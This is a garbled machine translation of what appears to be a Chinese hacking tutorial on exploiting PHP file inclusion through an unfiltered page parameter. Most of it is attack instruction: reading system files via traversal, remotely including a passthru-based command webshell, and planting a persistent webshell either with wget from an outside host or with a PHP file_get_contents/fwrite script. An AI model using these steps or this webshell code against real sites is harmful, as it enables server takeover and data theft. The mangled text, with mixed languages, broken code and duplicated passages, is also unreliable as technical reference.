PHP file include vulnerability principles of analysis and using the method-vulnerability warning-the black bar safety net

ID MYHACK58:62201026004
Type myhack58
Reporter 佚名
Modified 2010-01-20T00:00:00


One, relates to the hazard function of [include(),require()and the include_once(),require_once ()] to

include()&& the require()statement:includes and runs the specified file.

These two structures apart from in how to deal with failure than exactly the same. include()produces a warning while require()will cause a fatal error. In other words, if you want to in the face of lost when the file stop processing the page, use require () on. include()is not the case, the script will continue to run.

If"allow_url_fopen"in PHP is activated in the default configuration, you can also use a URL via HTTP or other supported encapsulation Protocol instead of a local file to specify to be included in the file. If the target server the target file as PHP code is interpreted, you can use suitable for HTTPGET URL request string to be included in the file transfer variables.

Detailed reference:<>

require_once () the & THE & the include_once()

require_once()and the include_once()statement in the script during the execution of includes and runs the specified file. This behavior and require()statement is similar, the only difference is if the file code has been included, then not included again. Suitable for in the script during the execution of the same file may be included more than once in case you want to make sure that it only be included once to avoid function re-defined, the variable re-assignment and other issues.

Detailed reference:<>

Second, why do you want to include the file

The programmer writes the program, don't like doing the same thing, also do not like to put the same code such as some utility functions to write a few times, so they need a common code written in a separate file inside, 比如share.php and then in the other file contains the call. In php, we are using the above listed that several function to achieve this purpose, it is the workflow: 如果你想在main.php里包含share.php I will write include("share.php")achieve the purpose, then you can use the share. in php a function, like this write the dead needs to contain the file name of the natural no problem, it will not appear vulnerability, then the problem is exactly where?

Sometimes may not be able to determine the need to which contains the file, such as the first point of view following the file index. php code:



if($_GET[page]){ include$_GET[page]; }else{ include"home.php"; } it is normal for a piece of PHP code that how it works? It comes to$_GET meaning, I do not intend to speak. you can write article HTTP article, if you still don't understand GET, POST,etc, then you need to re-Google some of the relevant information on the good mend.

The above code use the format could be like this:<> /index. php? page=main. php or<> /index.php?page=downloads.php combined with the above code, The simple to say how the operation:

  1. Submit this URL in the index. php just made this page the value of$_GET[page] is.

  2. Judgment$_GET[page]is not empty, if not empty 这里 是 main.php just using include to include this file.

  3. If$_GET[page]is empty, then execute the else, to includehome. php this file.

Third, why have the vulnerability

You might say, so good yeah, you can follow the URL to dynamically include files, how convenient! how to produce a vulnerability? The answer is: we are not well-behaved, and we always liked and others do not, we will not follow his links to the operation, we may want to write their own want to include calls to a file, for example, we'll just hit the following URL:<>is. Then our index. the php application just silly according to the above-we're steps to perform: 取page为hello.php then go to the include(hello.php), then the question arises, because we did not hello. php this file so it include the time it will alarm to the report, similar to the following information:


Warning:include(hello.php)[function. include]:failedtoopenstream:Nosuchfileordirectoryin/vhost/wwwroot/php/index. phponline3 Warning:include()[function. include]:Failedopening'hello.php'forinclusion(include_path='.:') in/vhost/wwwroot/php/index. phponline3 note above that Warning is not found we specify the hello. php file, which is included within our Designated path of the file; and behind the warning is because the front did not find the specified file, so the included time is a warning.

Fourth, how to use

Above you can see, the question arises, then, how do we take advantage of such vulnerability?, use of the method is actually a lot, but in essence are about the same, I said here three of the more common use of the method:

  1. Contains the read out of the target machine on the other file

From the foregoing we can see, due to the acquisition of the Parameters page there is no filtering, so we can specify any target on a host of other sensitive documents, such as previous warnings, we can see exposed the absolute path(vhost/wwwroot/php/), then we can repeatedly probe to include other files, such as specifying a URL:<>can read out the current path of the txt. txt file, you can also use../../for the directory to jump in did not filter../the case; you can also directly specify an absolute path, read sensitive system files, such as this URL: http: // if the target host does not have the access restrictions very strictly, or start the Apache permissions is relatively high, can be read out of this file content. Otherwise you will get a similar to: open_basedirrestrictionineffect. The Warning on.

  1. Contains can be run the PHP Trojan

If the target host of the"allow_url_fopen"is activated, the default is active, not many people will modify, we can have greater use of space, we can specify other URL on the one that contains the PHP code of the webshell to run directly, for example, I first write a command to run the PHP code, add a comment, it should be understand, the 如下 保存 为 cmd.txt(the suffix is not important, as long as the content is PHP format you can.

if(get_magic_quotes_gpc()) {$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);}//remove escape characters can be removed in a string the backslash character ini_set("max_execution_time",0);//Set for this document the execution time, 0 for no limit. echo" 1. S. T "; this article is a simple summary://print the return of the start line message passthru($_REQUEST["cmd"]);//run the cmd specifies the command echo"1. S. T";//print return end prompt information?& gt;above this file's role is to accept cmd specifies the command, and call the passthru function executes, the contents of the returned in 1. S. T between. Save this file to our host server may be not supported in the PHP of the host, as long as through the HTTP access to it.

//Print the return of the start line message passthru($_REQUEST["cmd"]);//run the cmd specifies the command echo" 1. S. T ";//print return end prompt information ?& gt; above this file's role is to accept cmd specifies the command, and call the passthru function executes, the contents of the returned in 1. S. T between. Save this file to our host server may be not supported in the PHP of the host, as long as through the HTTP access to can be, for example, the address is as follows:<>,then we can at that vulnerability on the host is configured as follows URL to use: http: //,wherein the cmd back is what you need to perform the command, the other commonly used commands in*UNIX for example as follows:


ll column Directory, a file equivalent to the Windows dir)

pwd view the current absolute path

idwhoami view the current user

wget to download the specified file URL

And so on the other, you host to go to BAIDU to find it, just not listed.

The above method is to get a Webshell up, although this PHP file is not on the target machine, but it really is a Webshell, isn't it? Huh)

  1. Contain a create file to PHP file

Some people might think or get the goal machine on a real Webshell relatively assured, if which day home found here contains bug fixes, we can no longer remote included get above the"pseudo"Webshell, isn't it? You can understand this mentality, we continue. Get a real Webshell, we also say that two kinds of common methods:

1)Use wget like command to download a Webshell

This is relatively simple, is also very commonly used, in the above we obtained that the pseudo-webshell, we can execute the command, then we can also call the system in a very powerful role, wget, the command of the powerful you can google the following, the parameters a bunch, absolutely engage in Halo youAnd Oh, we do not need so complex, we use a-O--output-document=FILE, the document written to FILE file you can, huh.

The premise is that you follow the previous steps to put the one that contains the PHP code of the Webshell in a Can by HTTP or FTP, etc. can visit places, such as:<>,in this file write is Webshell. Then we get the pseudo-Webshell performed in the following URL:<>: // - O1stphp.php if the current directory is writable, you can get one called 1stphp. php Webshell; if the current directory is not writable, you also need to think about other approaches.

2 Use the file to create

In front of the wget may encounter the current directory cannot be written; or the target host is disabled or not installed this command, we need to work around it, we can combine the previous include file vulnerability to contain a create file, write file, PHP script, the content is as follows:

$f=file_get_contents("";);//opens the specified path in the file stream $ff=fopen("./ upload/1st.php","a");//look for a directory, create a file fwrite($ff,$f);//put in front of an open file stream to write to the created file fclose($ff);//close the Save File ?& gt; or write above us used wget to download the php file, but we have improved the method, using a PHP script to achieve, you can use the above cmd. php? cmd=ll find you can write to the directory, such as here in the upload, then the file is created in the directory:./ upload/1st.php the. And then we get our Webshell.